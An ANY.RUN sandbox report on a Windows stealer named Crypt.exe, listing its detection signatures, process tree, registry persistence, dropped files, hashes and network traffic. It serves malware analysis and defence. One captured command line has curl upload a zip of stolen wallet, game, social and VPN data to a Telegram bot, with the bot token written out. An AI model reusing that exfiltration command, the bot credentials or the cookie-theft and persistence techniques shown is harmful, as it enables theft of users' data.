File name:

Crypt.exe

Full analysis: https://app.any.run/tasks/08bad818-abd9-41ed-874f-c559d96adb92
Verdict: Malicious activity
Threats:

Stealers are a category of malware designed to gain unauthorized access to users' information and transfer it to the attacker. The stealer category covers various programs that each focus on a particular kind of data, such as files, passwords, and cryptocurrency wallets. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed through phishing campaigns.

Analysis date: June 02, 2025, 00:00:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
telegram
evasion
stealer
auto-sch
auto-reg
auto-startup
octalyn
python
discord
susp-powershell
arch-doc
ims-api
generic
api-base64
crypto-regex
arch-html
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 4 sections
MD5:

3E68962725104A4F2DA2ED3EBED2DED8

SHA1:

BCFD45EE7D5831662601EDBB8A5647D0A144F8B5

SHA256:

6597D0A917F2DEF35809CFCFFD7C9098BC7E97EB62D35FB74486344208FAF61A

SSDEEP:

393216:01eSKrSBJyQ59oxZuq/88t9Qoqu6S5jkMu/mjDetHF9SP0qKiw56pTS9:01eSKrSBJyQ59oxZuq/88t9QoqtS5jrk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Create files in the Startup directory

      • win64.exe (PID: 1600)
    • Changes the autorun value in the registry

      • win64.exe (PID: 1600)
      • winupd.exe (PID: 7868)
    • Actions looks like stealing of personal data

      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)
    • Steals credentials from Web Browsers

      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)
    • Uses Task Scheduler to autorun other applications

      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 6644)
    • OCTALYN has been detected

      • tg_64.exe (PID: 5720)
      • powershell.exe (PID: 7948)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7948)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 3140)
    • Suspicious data exfiltration via CURL detected

      • tg_64.exe (PID: 5720)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5568)
    • Changes powershell execution policy (Bypass)

      • blsd_win64.exe (PID: 6876)
    • Suspicious browser debugging (Possible cookie theft)

      • chrome.exe (PID: 7732)
      • chrome.exe (PID: 6488)
      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 3096)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
      • tg_64.exe (PID: 5720)
      • uac.exe (PID: 2268)
      • blsd_win64.exe (PID: 6876)
    • Executable content was dropped or overwritten

      • win64.exe (PID: 1600)
      • Crypt.exe (PID: 5304)
      • Port.exe (PID: 1244)
      • uac.exe (PID: 772)
    • Base64-obfuscated command line is found

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
    • BASE64 encoded PowerShell command has been detected

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
    • Reads security settings of Internet Explorer

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
      • not64.exe (PID: 5400)
    • The process creates files with name similar to system file names

      • Port.exe (PID: 1244)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • not64.exe (PID: 5400)
      • curl.exe (PID: 1128)
      • blsd_win64.exe (PID: 6876)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 2268)
    • Starts itself from another location

      • Port.exe (PID: 1244)
    • Loads DLL from Mozilla Firefox

      • tg_64.exe (PID: 5720)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2196)
      • uac.exe (PID: 2268)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7948)
    • Connects to unusual port

      • rundll32.exe (PID: 6644)
    • Process drops python dynamic module

      • uac.exe (PID: 772)
    • The process drops C-runtime libraries

      • uac.exe (PID: 772)
    • Process drops legitimate windows executable

      • uac.exe (PID: 772)
    • Data upload via CURL

      • curl.exe (PID: 1128)
    • Loads Python modules

      • uac.exe (PID: 2268)
    • Application launched itself

      • uac.exe (PID: 772)
    • Starts CMD.EXE for commands execution

      • uac.exe (PID: 2268)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 6808)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7860)
    • Multiple wallet extension IDs have been found

      • blsd_win64.exe (PID: 6876)
    • There is functionality for taking screenshot (YARA)

      • rundll32.exe (PID: 6644)
    • Found regular expressions for crypto-addresses (YARA)

      • rundll32.exe (PID: 6644)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • blsd_win64.exe (PID: 6876)
    • The process executes Powershell scripts

      • blsd_win64.exe (PID: 6876)
    • MS Edge headless start

      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 5596)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5344)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 7552)
      • msedge.exe (PID: 2392)
      • msedge.exe (PID: 3096)
  • INFO

    • Checks supported languages

      • Crypt.exe (PID: 5304)
      • win64.exe (PID: 1600)
      • Port.exe (PID: 1244)
      • ps_suppressor.exe (PID: 4380)
      • not64.exe (PID: 5400)
      • netFrame.exe (PID: 5164)
      • tg_64.exe (PID: 5720)
      • blsd_win64.exe (PID: 6876)
      • rundll32.exe (PID: 6644)
      • rundll32.exe (PID: 7052)
      • winupd.exe (PID: 7868)
      • uac.exe (PID: 772)
      • uac.exe (PID: 2268)
      • curl.exe (PID: 1128)
    • Process checks computer location settings

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
    • Reads the computer name

      • Crypt.exe (PID: 5304)
      • Port.exe (PID: 1244)
      • netFrame.exe (PID: 5164)
      • blsd_win64.exe (PID: 6876)
      • rundll32.exe (PID: 6644)
      • tg_64.exe (PID: 5720)
      • rundll32.exe (PID: 7052)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 772)
      • curl.exe (PID: 1128)
      • uac.exe (PID: 2268)
    • Create files in a temporary directory

      • Crypt.exe (PID: 5304)
      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 7452)
      • grpconv.exe (PID: 5972)
      • uac.exe (PID: 772)
      • grpconv.exe (PID: 5404)
    • Creates files or folders in the user directory

      • win64.exe (PID: 1600)
      • not64.exe (PID: 5400)
      • Port.exe (PID: 1244)
      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 7452)
      • grpconv.exe (PID: 5972)
      • grpconv.exe (PID: 4180)
      • grpconv.exe (PID: 1452)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)
      • grpconv.exe (PID: 7284)
      • grpconv.exe (PID: 5416)
    • Launch of the file from Startup directory

      • win64.exe (PID: 1600)
    • Launch of the file from Registry key

      • win64.exe (PID: 1600)
      • winupd.exe (PID: 7868)
    • Reads Environment values

      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 6644)
      • rundll32.exe (PID: 7052)
    • Checks proxy server information

      • not64.exe (PID: 5400)
      • powershell.exe (PID: 3140)
      • uac.exe (PID: 2268)
    • Reads the software policy settings

      • not64.exe (PID: 5400)
    • Attempting to use instant messaging service

      • not64.exe (PID: 5400)
      • svchost.exe (PID: 2196)
    • Reads the machine GUID from the registry

      • rundll32.exe (PID: 6644)
      • blsd_win64.exe (PID: 6876)
      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 7052)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 2268)
    • Manual execution by a user

      • rundll32.exe (PID: 7052)
      • winupd.exe (PID: 7868)
      • notepad.exe (PID: 7320)
      • notepad.exe (PID: 6496)
      • notepad.exe (PID: 7780)
      • OpenWith.exe (PID: 8048)
      • OpenWith.exe (PID: 5352)
      • OpenWith.exe (PID: 6028)
      • msedge.exe (PID: 2140)
      • OpenWith.exe (PID: 7572)
      • msedge.exe (PID: 3096)
      • notepad.exe (PID: 6456)
      • notepad.exe (PID: 5552)
      • notepad.exe (PID: 7848)
      • notepad.exe (PID: 1088)
      • notepad.exe (PID: 5596)
      • notepad.exe (PID: 7908)
      • notepad.exe (PID: 668)
      • notepad.exe (PID: 7948)
      • notepad.exe (PID: 5408)
      • notepad.exe (PID: 6920)
    • Disables trace logs

      • powershell.exe (PID: 3140)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7948)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7948)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7948)
    • The executable file from the user directory is run by the Powershell process

      • uac.exe (PID: 772)
    • The sample compiled with english language support

      • uac.exe (PID: 772)
    • Execution of CURL command

      • tg_64.exe (PID: 5720)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 6808)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 716)
    • Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')

      • blsd_win64.exe (PID: 6876)
    • Potential library load (Base64 Encoded 'LoadLibrary')

      • blsd_win64.exe (PID: 6876)
    • Potential dynamic function import (Base64 Encoded 'GetProcAddress')

      • blsd_win64.exe (PID: 6876)
    • Potential remote process memory interaction (Base64 Encoded 'VirtualAllocEx')

      • blsd_win64.exe (PID: 6876)
    • Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')

      • blsd_win64.exe (PID: 6876)
    • Potential access to remote process (Base64 Encoded 'OpenProcess')

      • blsd_win64.exe (PID: 6876)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7948)
    • Application launched itself

      • chrome.exe (PID: 7732)
      • chrome.exe (PID: 6488)
      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 3096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 15986688
UninitializedDataSize: -
EntryPoint: 0x1635
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes
254
Monitored processes
130
Malicious processes
21
Suspicious processes
1

Behavior graph

start crypt.exe powershell.exe no specs conhost.exe no specs port.exe win64.exe netframe.exe no specs ps_suppressor.exe no specs not64.exe #OCTALYN tg_64.exe powershell.exe conhost.exe no specs svchost.exe blsd_win64.exe schtasks.exe no specs conhost.exe no specs rundll32.exe grpconv.exe no specs #OCTALYN powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs rundll32.exe no specs winupd.exe grpconv.exe no specs grpconv.exe no specs uac.exe grpconv.exe no specs curl.exe conhost.exe no specs uac.exe grpconv.exe no specs grpconv.exe cmd.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs openwith.exe no specs chrome.exe no specs rundll32.exe no specs chrome.exe chrome.exe no specs openwith.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs openwith.exe no specs openwith.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no 
specs msedge.exe no specs slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs crypt.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID:
668
CMD:
"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\GetBookmarks.txt
Path:
C:\Windows\System32\notepad.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID:
680
CMD:
"C:\Windows\SysWOW64\grpconv.exe" /stext "C:\Users\admin\AppData\Roaming\DefenderLogs-output_20250602000037.txt"
Path:
C:\Windows\SysWOW64\grpconv.exe
Parent process:
blsd_win64.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Progman Group Converter
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\grpconv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID:
716
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
Crypt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
772
CMD:
"C:\Users\admin\AppData\Local\Temp\uac.exe"
Path:
C:\Users\admin\AppData\Local\Temp\uac.exe
Parent process:
powershell.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\uac.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID:
1088
CMD:
"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\system_info.txt
Path:
C:\Windows\System32\notepad.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID:
1128
CMD:
curl.exe -F "chat_id=-1002543167462" -F "document=@\"C:\Users\admin\AppData\Local\Temp\admin_OctalynRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7707984358:AAEIukqaP3WJYxoS3Cr2caD890RFs_jFfII/sendDocument
Path:
C:\Windows\System32\curl.exe
Parent process:
tg_64.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
PID:
1196
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1240
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\Google\Chrome\User Data" --extension-process --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3092 --field-trial-handle=1984,i,13720578385027826937,7926287347579266832,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:2
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
4294967295
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
PID:
1244
CMD:
"C:\Users\admin\AppData\Local\Temp\Port.exe"
Path:
C:\Users\admin\AppData\Local\Temp\Port.exe
Parent process:
Crypt.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3
Version:
1.6.0
Modules
Images
c:\users\admin\appdata\local\temp\port.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID:
1284
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --disable-quic --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=1984,i,13720578385027826937,7926287347579266832,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:8
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
76 847
Read events
76 764
Write events
81
Delete events
2

Modification events

(PID) Process:
(5400) not64.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:
write
Name:
CachePrefix
Value:

(PID) Process:
(5400) not64.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:
write
Name:
CachePrefix
Value:
Cookie:

(PID) Process:
(5400) not64.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:
write
Name:
CachePrefix
Value:
Visited:

(PID) Process:
(1600) win64.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:
delete value
Name:
WindowsUpdate
Value:

(PID) Process:
(1600) win64.exe
Key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:
write
Name:
winupd
Value:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupd.exe

(PID) Process:
(3140) powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:
write
Name:
EnableFileTracing
Value:
0

(PID) Process:
(3140) powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:
write
Name:
EnableAutoFileTracing
Value:
0

(PID) Process:
(3140) powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:
write
Name:
EnableConsoleTracing
Value:
0

(PID) Process:
(3140) powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:
write
Name:
FileTracingMask
Value:

(PID) Process:
(3140) powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:
write
Name:
ConsoleTracingMask
Value:
Executable files
202
Suspicious files
382
Text files
217
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID:
5304
Process:
Crypt.exe
Filename:
C:\Users\admin\AppData\Local\Temp\win64.exe
Type:
executable
MD5: 18029CE6FB5ECEAB48EC1721C1C3D5A0
SHA256: B495D130B930FC7C7ED5C54996ECD1589DE51DF36BC1CF8D3C87A5F99D37E587

PID:
5304
Process:
Crypt.exe
Filename:
C:\Users\admin\AppData\Local\Temp\Port.exe
Type:
executable
MD5: D9ECE5EF4B7980F4A2D7755B9688E73A
SHA256: 9791BAFF96966181E181BD77C6B58D5653664C4C69F0423730C8FB769A6EE5D1

PID:
5720
Process:
tg_64.exe
Filename:
C:\Users\admin\AppData\Local\Temp\Octalyn\discord.txt
MD5:
SHA256:

PID:
5720
Process:
tg_64.exe
Filename:
C:\Users\admin\AppData\Local\Temp\1GB6lAQ.db
MD5:
SHA256:

PID:
5400
Process:
not64.exe
Filename:
C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].json
Type:
binary
MD5: 7DEFB0085FC9B85361B2BD2943EF279E
SHA256: A1651568AA1D6A70697BEB4975E046C7B5E9C16DCED36744B14ABC9A0DD75FC1

PID:
5304
Process:
Crypt.exe
Filename:
C:\Users\admin\AppData\Local\Temp\netFrame.exe
Type:
executable
MD5: 2B59A5D7C8C63AAA313EF7D969FF1B9D
SHA256: DF03A67AA8C6679FD79B40F2D6E4FE05C2968FBF813F8C13EA8147535A46CB58

PID:
5720
Process:
tg_64.exe
Filename:
C:\Users\admin\AppData\Local\Temp\eaDhiKq.db
MD5:
SHA256:

PID:
1600
Process:
win64.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupd.exe
Type:
executable
MD5: 18029CE6FB5ECEAB48EC1721C1C3D5A0
SHA256: B495D130B930FC7C7ED5C54996ECD1589DE51DF36BC1CF8D3C87A5F99D37E587

PID:
5304
Process:
Crypt.exe
Filename:
C:\Users\admin\AppData\Local\Temp\ps_suppressor.exe
Type:
executable
MD5: 7053207081615A591F31B7D99ECB22CC
SHA256: 9E0EA85D56023DB4D22CCBB412A408F2D1A7B7D2BC7DCAA6C30C0FBF82C5C83B

PID:
5720
Process:
tg_64.exe
Filename:
C:\Users\admin\AppData\Local\Temp\QTgm8d1.db
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
214
DNS requests
136
Threats
30

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2268
uac.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/91.217.249.43
unknown
whitelisted
8116
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8116
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D
unknown
whitelisted
5400
not64.exe
GET
200
34.117.59.81:80
http://ipinfo.io/json
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CCEVy5zGFpEO7
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5608
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5400
not64.exe
34.117.59.81:80
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted
5400
not64.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
5400
not64.exe
192.124.249.22:80
ocsp.godaddy.com
SUCURI-SEC
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
google.com
  • 142.250.185.142
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
ocsp.godaddy.com
  • 192.124.249.22
  • 192.124.249.36
  • 192.124.249.24
  • 192.124.249.23
  • 192.124.249.41
whitelisted
MatrixShell-63771.portmap.io
  • 193.161.193.99
malicious
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.109.133
whitelisted

Threats

PID
Process
Class
Message
5400
not64.exe
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
5400
not64.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ipinfo.io
2196
svchost.exe
Device Retrieving External IP Address Detected
